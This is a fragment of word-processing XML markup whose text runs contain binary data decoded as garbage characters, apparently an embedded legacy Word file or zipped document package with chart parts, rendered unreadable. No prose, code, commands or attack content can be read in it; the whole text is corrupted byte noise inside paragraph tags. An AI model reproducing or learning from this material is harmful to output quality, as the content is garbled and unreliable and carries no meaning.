        <w:t>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(#######0#######8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###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?########A####?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?#####3#"?####?###`#?###?#?########?#######?2##??#####U'(`.??3????jE?[?#?#######?######</w:t>
        <w:br/>
        <w:t>`!#?###U'(`.??3????jE?[?###########?###s###??F#8?##b####?x??X_?#E#?f[???.#?'?#E#??N.V?QP??r?R#Fc?#?`####??b###?6r?#$F#?#!? ?3&amp;?`#A#*?&amp;#</w:t>
        <w:br/>
        <w:t>i??^?????f???nw????\???|??7?????##?#?###??O1?</w:t>
        <w:tab/>
        <w:t>?'FO?}??[??Q?U?????/???J?by=??+</w:t>
        <w:br/>
        <w:t>J??# ?g&gt;?r9F#?m^?</w:t>
        <w:br/>
        <w:t>#)?-#???a???(##E?#?#n3?q?###n??87-?</w:t>
        <w:tab/>
        <w:t>??!??#?=E??3Q#Gt?3?V~#??dF#\QQ2????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`?Q?Z??$??v7?5n??5q?m?V??b?#?d???#_???[?k|???!##?#?p???a#)?&amp;~???/???t?|?s#N_???#HV#u?????(&gt;e?#??8?????[f?F&lt;X??;$?#?q?????_t???ly#/c?????m?[&amp;??&gt;qY?#;/l??B?1h|?|?1?/?5??????,?#|x#??{c}?#?#?`?Q?#????#s?`#^?#?s#o/MXA~S??h??Y?HW)!?^??s|nx?]&lt;?Z???j???ц?E#???c;?{??}?#??#_?}@????W#??!?I1w#C</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?????^??7N???</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?##??1???N?&gt;?#ǘ#??#m????^g#?#?&lt;??.??##k?k?|q#??m</w:t>
        <w:br/>
        <w:t>?G?&gt;_??|?/?O[7#_#?w???!?[#?=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?.???D?#???#{??i??`??nU/??#fb#17??#??#??h??})??hC?????c??}#?#????+}c}x?</w:t>
        <w:br/>
        <w:t>?m?/#??#?$???p????95????#sj~#?|??=?#??x???]?#?:?]???#oW#??#o7?????#o???k??</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?3??????6??#T???#?#Qι</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>蛦</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>??s#????##y?4N?9??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#??,?W???Z?2?#g?|5#K????6?M???6])??-?Ж?? m</w:t>
        <w:tab/>
        <w:t>?#???C[?G[????r??#mY#mY?U?aj?;??}??I[^)?????V??V m#?#?6u##w##{??$##???-?Ж??&amp;cs?-#???C[?G??-??R??*#m##m2?B?*!k?`??:X}m2???,???ph3|??X??#!k+3????6#+??r8??r?3?z.?w????]?C????3#s?s??l?f??Y*N#M??@w6@?I?5?{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"W??f??ixF??(#/~5????tQ??U?????#?X???)?#?#???%#ц??}??i8;??U??l#2p?##???X??q?#?????G#??S?j#?s???x???,}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d?QC???C??o?kk#?&gt;?w???^,=???G?}r??R;N?N?#??/???#?????c??L?&lt;=b5-L6????="?????e??0???#?b?</w:t>
        <w:br/>
        <w:t>ω?o?????????7??jM????U???3???##l??g1y#?8=]?9????&amp;??o??#???r?1M??jkq?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Ac?y?I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i?#??G#?u&amp;#?{#Δ???</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>gb?#1??Ot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>wh5?V?J?Y?f{?f???r?#???~X?MX?D#6?|-l:#?va?#6#???y#?#??]??-#`#.???&gt;?H7#Nl???#?9#?daK#?#[???#l??`#?????oc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#k#`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#?la?#?2?+T]9?#Z?r?6[????S?##s;c?#</w:t>
        <w:br/>
        <w:t>##D#d#######</w:t>
        <w:br/>
        <w:t>#############?!?#?#?####################################?h###?#</w:t>
        <w:br/>
        <w:t>?#########</w:t>
        <w:br/>
        <w:t>##s##?*####?#?##A####?##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?#####3#"?####?###`#?###?#?########?#######?2##?J</w:t>
        <w:tab/>
        <w:t>####tU?#?h?</w:t>
        <w:br/>
        <w:t>&gt;sv?h???#&amp;</w:t>
        <w:tab/>
        <w:t>######V######</w:t>
        <w:br/>
        <w:t>`!#?#</w:t>
        <w:tab/>
        <w:t>##tU?#?h?</w:t>
        <w:br/>
        <w:t>&gt;sv?h??@8##########4###:###x?Q#?n##?####?x??Z]?#U#&gt;????#ub?D??H??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H5</w:t>
        <w:tab/>
        <w:t>??E7?#?????#1M?Y#???qwCov_?e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?n</w:t>
        <w:br/>
        <w:t>P???</w:t>
        <w:tab/>
        <w:t>#?bTL??A?&amp;D??LBl#???:?????b#????;?;??S]?# ?{5?#X?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>???KaY?}c?oa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?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??#?L;/}?#?##?##p??#?#\?e{?0?#?#s;#??v?y?#??i???&lt;???+#?3#\?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?#s?????)??(#?}??;Iv?h##??%????r?C?#?#BW^??7]3????G???##?W?}?^?#??????#?u</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>/#?,k?????#yI#?j;L_??#?-?aN?0?:##??n^?0?m#A??o/#???;#?p#??2?????/pt?C???#_??~#o[JR???#?#?1?6????{?#???3????_6?N|e??_??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[x]?#?????r?n?i?K??d?#^nSd?##?o\f?Is?##????}###?#Z???l??##?"r?1??'1&lt;p-?</w:t>
        <w:tab/>
        <w:t>?#?[l????y?k#/!?????Xd#??E?N#??C?[&amp;?)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???#;???N#?\??9?mg#?bA??o6|?#vc??ul?|?}.Doy#|?#??#?G???????^?7#??????G^?hze_??50"&amp;N??w;a?#?w{J???:??0a???=?Z?#?{?????=?R?*?O?{#??,?W?%?#??#?#a7??},A?s7?^</w:t>
        <w:br/>
        <w:t>?{?:O#?l???)u#h:?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#7`#u??:?m??</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>盡</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Z?#???h?J?;6?Imx#[??????C??=?6??,??k???#?#?wy?U???U?d_G?_x6?{?#?5?5???E#.??#?,??Gg-&lt;????#?|Ze#??}I?&gt;????;?'???_???m??#??$g?d1o??1?eAe_R??=??C???e??</w:t>
        <w:br/>
        <w:t>#G??#ǖ4V?#?ke?q???8?+??c#??V??k??????IP???,?}W*?Q??f^M??^??zs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?F?????X?:?#?'??M???W????h?:??m6??#?????????:?wT&gt;??-??@r#???1SV??)?)?Vg-?=??.?g}&gt;??y6sX??B?Se#?#??&lt;*????`#??#Y??f??RV?3e?;?9??/???Y_,?fi?,????#?&lt;??</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>^???0??V$?#J=?[Qy#t?:?z??U?\;???I?</w:t>
        <w:br/>
        <w:t>q?u9???V??V??VU?1#??U?P?#7?G?#????R?*n6?#7;???????g#??#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)["n????jqsc???????[M?[-????#?Z?q?&gt;???#?/8?L??? ??(???IY?M?[9?Y??#k{??#?m????Y?#m/L??1????#?J#?N?o#????</w:t>
        <w:br/>
        <w:t>x#?#~'?#??????o????q??&gt;?s?e????Mp?3?V????V???qs???f??q?5???17?#?{SZn#?#7???:?$???KV?L???#73cn???j???17G??4??i17~?)??##?{?sS??#U#?##??#~?v?(?r???\?J?~=???</w:t>
        <w:tab/>
        <w:t>c(?]B?@?=?3;?!???H?#?[h#8#??????#??????#b???Z#???j</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>lC_:</w:t>
        <w:tab/>
        <w:t>??(_??}!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tab/>
        <w:t>1???wg?c#~p*.[??&amp;nf??x?3?#6??????U?#?=;E???????HL;??cQ?r$?H$???1]???g.#q?H#??]?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?V?#{m??vF??Z??]?D? ?uR?##?9J??@?i?2???#??#?n?#?o??g?a,???'?L#K#??+#??%??/0`?\0#?\</w:t>
        <w:br/>
        <w:t>????w?1?e??M~?f0#??TX??]??+g???{#}??#??##&lt;??#w????cQ?#0?r`??o???k_?y?}/?????Y?#?i?H??#1R??=?????~???]?^##??"&amp;?#bL&gt;??B?D????#???yC?;??#????w?N???g4~E?#???}?=???L??%?#S?US??,???d?To? j/???@NH?????4?#e??/GrD&lt;?m?#??UG$??!#?\%?&gt;H#?RJ?Z?G???7#f?#|?LZ?#X?#=+a?,?###?-???6/&lt;,?3@b??XG?lE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>???Nb+?X?????[???#??]`??,?n#k?]???,??t?%#[J?[</w:t>
        <w:br/>
        <w:t>?u}??`?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>???Z???u??r#??</w:t>
        <w:tab/>
        <w:t>?#?J?CF&lt;g???#?[??ymL&gt;??B ?#~&gt;???g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+&gt;????#?U#[M?V??2?_??/????#?v#[?#l)?u}???u#???%`k#???19?a#;?\'?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?C???6v???.?f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-#k%`?#??N##%?w?4g:9O;?y#~6?x??#??~?##$##$#If#####?##!v##h#5?####?#5?####?#5?####?#5?####?#5?####?##v##?#:V###?l##?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,?####5?####?#4?#######?T##?##$##$#If#####?##!v##h#5?####?#5?####?#5?####?#5?####?#5?####?##v##?#:V###?l##?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,?####5?####?#4?#######?T##?##$##$#If#####?##!v##h#5?####?#5?####?#5?####?#5?####?#5?####?##v##?#:V###?l##?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,?####5?####?#4?#######?T##?##$##$#If#####?##!v##h#5?####?#5?####?#5?####?#5?####?#5?####?##v##?#:V###?l##?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,?####5?####?#4?#######?T##?##$##$#If#####?##!v##h#5?####?#5?####?#5?####?#5?####?#5?####?##v##?#:V###?l##?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,?####5?####?#4?#######?T##?##$##$#If#####?##!v##h#5?####?#5?####?#5?####?#5?####?#5?####?##v##?#:V###?l##?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,?####5?####?#4?#######?T##?##$##$#If#####?##!v##h#5?####?#5?####?#5?####?#5?####?#5?####?##v##?#:V###?l##?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,?####5?####?#4?#######?T#####$##$#If#####?##!v##h#5?####R#5?####?#5?####?#5?####?#5?####?#5?####?##v##R##v##?##v##?##v##?##v##?#:V###?l##??#</w:t>
        <w:br/>
        <w:t>t##?##?0###?#######?#######?#######?#######?#######?#####?####6#,?####5?####R#5?####?#5?####?#5?####?#5?####?#/?#######?#### ?########/?#######?####yt1L?#?##$##$#If#####?##!v##h#5?####R#5?####?#5?####?#5?####?#5?####?#5?####?##v##R##v##?##v##?##v##?##v##?#:V###?l#</w:t>
        <w:br/>
        <w:t>t##?##?0###?#######?#######?#######?#######?#######?#####?####6#5?####R#5?####?#5?####?#5?####?#5?####?#yt1L?#?##$##$#If#####?##!v##h#5?####R#5?####?#5?####?#5?####?#5?####?#5?####?##v##R##v##?##v##?##v##?##v##?#:V###?l#</w:t>
        <w:br/>
        <w:t>t##?##?0###?#######?#######?#######?#######?#######?#####?####6#5?####R#5?####?#5?####?#5?####?#5?####?#yt1L?#?##$##$#If#####?##!v##h#5?####R#5?####?#5?####?#5?####?#5?####?#5?####?##v##R##v##?##v##?##v##?##v##?#:V###?l#</w:t>
        <w:br/>
        <w:t>t##?##?0###?#######?#######?#######?#######?#######?#####?####6#5?####R#5?####?#5?####?#5?####?#5?####?#yt1L?#?##$##$#If#####?##!v##h#5?####R#5?####?#5?####?#5?####?#5?####?#5?####?##v##R##v##?##v##?##v##?##v##?#:V###?l#</w:t>
        <w:br/>
        <w:t>t##?##?0###?#######?#######?#######?#######?#######?#####?####6#5?####R#5?####?#5?####?#5?####?#5?####?#yt1L?#?##$##$#If#####?##!v##h#5?####R#5?####?#5?####?#5?####?#5?####?#5?####?##v##R##v##?##v##?##v##?##v##?#:V###?l#</w:t>
        <w:br/>
        <w:t xml:space="preserve">t##?##?0###?#######?#######?#######?#######?#######?#####?####6#5?####R#5?####?#5?####?#5?####?#5?####?#yt1L?#?##$##$#If#####?##!v##h#5?####K#5?####?#5?####U#5?#### </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">5?####?##v##K##v##?##v##U##v## </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#v##?#:V###?l##4##?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?#######?#####?####?###,?####5?####K#5?####?#5?####U#5?#### </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">5?####?#4?#######f4#?##$##$#If#####?##!v##h#5?####K#5?####?#5?####U#5?#### </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">5?####?##v##K##v##?##v##U##v## </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#v##?#:V###?l##4##?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?#######?#####?####?###,?####5?####K#5?####?#5?####U#5?#### </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">5?####?#4?#######f4#?##$##$#If#####?##!v##h#5?####K#5?####?#5?####U#5?#### </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">5?####?##v##K##v##?##v##U##v## </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#v##?#:V###?l##4##?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?#######?#####?####?###,?####5?####K#5?####?#5?####U#5?#### </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">5?####?#4?#######f4#?##$##$#If#####?##!v##h#5?####K#5?####?#5?####U#5?#### </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">5?####?##v##K##v##?##v##U##v## </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#v##?#:V###?l##4##?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?#######?#####?####?###,?####5?####K#5?####?#5?####U#5?#### </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>5?####?#4?#######f4#s##$##$#If#####?##!v##h#5?####?#5?####E#5?####E#5?####E##v##?##v##E#:V!##?l#</w:t>
        <w:br/>
        <w:t>t##?##?####6##?###5?####?#5?####E#yt?l7#s##$##$#If#####?##!v##h#5?####?#5?####E#5?####E#5?####E##v##?##v##E#:V!##?l#</w:t>
        <w:br/>
        <w:t>t##?##?####6##?###5?####?#5?####E#yt?l7#s##$##$#If#####?##!v##h#5?####?#5?####E#5?####E#5?####E##v##?##v##E#:V!##?l#</w:t>
        <w:br/>
        <w:t>t##?##?####6##?###5?####?#5?####E#yt?l7#s##$##$#If#####?##!v##h#5?####?#5?####E#5?####E#5?####E##v##?##v##E#:V!##?l#</w:t>
        <w:br/>
        <w:t>t##?##?####6##?###5?####?#5?####E#yt?l7#s##$##$#If#####?##!v##h#5?####?#5?####E#5?####E#5?####E##v##?##v##E#:V!##?l#</w:t>
        <w:br/>
        <w:t>t##?##?####6##?###5?####?#5?####E#yt?l7#?##$##$#If#####?##!v##h#5?####?#5?####?#5?####?#5?####?#5?####?#5?####?##v##?#:V###?l##?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,?####5?####?#4?#######?T##?##$##$#If#####?##!v##h#5?####?#5?####?#5?####?#5?####?#5?####?#5?####?##v##?#:V###?l##?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,?####5?####?#4?#######?T##?##$##$#If#####?##!v##h#5?####?#5?####?#5?####?#5?####?#5?####?#5?####?##v##?#:V###?l##?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,?####5?####?#4?#######?T##?##$##$#If#####?##!v##h#5?####?#5?####?#5?####?#5?####?#5?####?#5?####?##v##?#:V###?l##?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,?####5?####?#4?#######?T##?##$##$#If#####?##!v##h#5?####?#5?####?#5?####?#5?####?#5?####?#5?####?##v##?#:V###?l##?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,?####5?####?#4?#######?T##?##$##$#If#####?##!v##h#5?####?#5?####?#5?####?#5?####?#5?####?#5?####?##v##?#:V###?l##?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,?####5?####?#4?#######?T##??##D#d#######</w:t>
        <w:br/>
        <w:t>#############. ##?#?####################################?###?#</w:t>
        <w:br/>
        <w:t>?#########</w:t>
        <w:br/>
        <w:t>##c##?0######?###????#A####?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?Vh? #1#7###3#"?:########??(###?#####PK##########!#@#?A0###?#######[Content_Types].xml???n?0#E???#??U????*#??.??#`?##5~?c#?}'?,?JAb?(??='??#;?#"6?#|"r??io#?.???5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F??A???|1?????#?Q?a??3??k?</w:t>
        <w:br/>
        <w:t>?#?h???D?q-???j</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>r??R{???,?#|&gt;+?R?6??^#L"????ac?*?</w:t>
        <w:br/>
        <w:t>?m?Jd*;g~Q?#APr?u#?4???Я?##s?4??#`#*?7eIC??#???Z???KZ?|U5#D#q9?F?s?&amp;#??6?#q:?#?x??4ca???a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N#?p#?nw8??d`??E????#??nl???9?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}q??#?N/??k?#??c#[F2???3??2z?Q?????L?Z?%R6??zP?#????????#?T??](??#</w:t>
        <w:br/>
        <w:t>#???##[???j?,#?Z?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?#??#P?[i???##??T;GI?4Ew??=}?3??b9`5?Y?C?kρ?????#?9?#?o?~#?e?z??r?###??##PK##########!#3qc#####-#######drs/e2oDoc.xml???J?0#???#??f[E?l??"x?#0&amp;?&amp;?&amp;a????f???'a/a?#???????&lt;?O??cP?l? (?h|##??=?=??#??)#R?M#????nI#????#?</w:t>
        <w:br/>
        <w:tab/>
        <w:t>?[?#WJ???ьy##?:??g,U?(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?R??$???Q.?M?)??#NC?W????????#Toe}YA????8J??##????#?02?#??_?#??#(?Ke?n?Φ??3?????Z?i??0S(???&amp;,?????Ap?#~1?1;?g?K]??+??###??##PK##########!#???"O####### ###drs/charts/_rels/chart1.xml.rels??OK?0#????n?? 2???#d ?Kl?v?4)I?????(#E#APw##v#et?}#??oaT###^???????}?R%</w:t>
        <w:br/>
        <w:t>??#B??Y(o?#???&lt;#m6?V?!#a#????? Q???P?#J??$[~(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Ma?B-??"??nA@??C`Zq?#??O???;?#\?</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>喱</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>??@?#?Qs,$jN##?v???fs??mX??n#L???B}k#l??Dx?,??#td\-6?????9?\4?????e6:O??x??{ig?^ǔ?Q?}H:o??0#?6??Ar#???&gt;?~???S3?2?#?sGg?F</w:t>
        <w:br/>
        <w:t>###??C??sH??#u??#?</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>氐</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>i?o???yS#?##?#Z?###??##PK##########!#?#?F?###"#######drs/_rels/e2oDoc.xml.rels???</w:t>
        <w:br/>
        <w:t>?0#???#?n?z#?&amp;??Ы?#X??#?I?F?oo???qv?ov??1O?N?Gg##Y#??q?h{#???????YR?#C???L#?#?a?,#??!F???@3r?&lt;??t.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????N?O#?/??[#?n##??S???????L6???f?###COQ?K??Zd?S???_??###??##PK##########!#%Q&gt;??###########drs/downrev.xmlL?AK?@#???a#????Zc&amp;?#?S[#???#??!;m?w?????{??M????4??3B?H@#7???"?#??5? ??#&lt;#?##??W?????{iU,?#?Nd?#MG??#????'g$??v2?X?#?L?{?L?q?3#=w?|?O#?}U</w:t>
        <w:tab/>
        <w:t>g?N?~?U?d?###oo??#(?Y???#??LGb#?##??#??2{#uDX?Y#?,???###??##PK##########!#F#qS?###?#######drs/charts/chart1.xml?XKo#7#?#?P#?&amp;??#[?#(r?#?? vR?7j????#.?H9?(??z*z?? ?!?$#??S#?)?3|?C?#??#z?????f??W#1??L#?????U(#D#?q?{?i????0?i?[???????#L?T?</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>h#??#t??RI?ZM?</w:t>
        <w:tab/>
        <w:t>?IzY$?C?H?(???j(?#0#?j?VkW?#?# ?@L"??ˋ?#?Q#?=#?b?Y???(@ ?DI??`s!Q??5+so^???#&gt;6???K?[F(ō?4##?#?~#t?LQ???@p#??}?#B*&amp;r:K.#"N`qèEj??###???}T????H??#~?##?3P?Q E*F?2X?##?7???v?n?#????T-#5#?ku?m5?W/a?06$?#?)(g?y?#\##G#L#??h.+?????Z@+?Bk8????2h?Sh? # A?6?#??$?i8I??#(F#?2???????$m?2a#?#???UF??0#?2#?C#7CfJ?D??=??a!#?N??KJP????)#RC"#?G(??^$?@0c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X1??#R44?s"?#?D)??#T??(\?? dH?y#?j?z????^?~?????&lt;?????&lt;{?</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>舊</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>o_??[?^?5?##?P7G??#Brn??###?,E{?D&lt;8?c??</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>貴</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>#?G?p0?|?#?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??E?9?#Sy??6?##gl_?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??#G#?:?#v#qZ?Q?Y??h/?J?#??w&lt;?T?_l??????-#??]?4 @r???#P?]?#??DU#}$##p???N????L?\N????</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>j?\??A???56?5s??#?V???????g?#?#1?1??E#"#???#??#~=##?2???2#!?]?@??i5}?h?#T{?s?u*?1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?#???Z#?f}??sF??V?9?U[Q#?s??s?F#?b?#K?#f?%?#???lic?|#?jb??e?@#7-?/j~?5MF?t??M=#L#)#??f|\?^S#????</w:t>
        <w:br/>
        <w:t>?k%#?&gt;????#?O?[?}?????a^%?Nqu?%???2?L?]D???Q??9?_?z#~y??????##????QW?f?q????#H?#J?#??S?`?hz7??'6?};k</w:t>
        <w:tab/>
        <w:t>?Q#??:?u???s??&gt;??2#??F?#</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>擔</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>pd????xWp????Vw##j?#wv????v?ajx(U??##??#</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
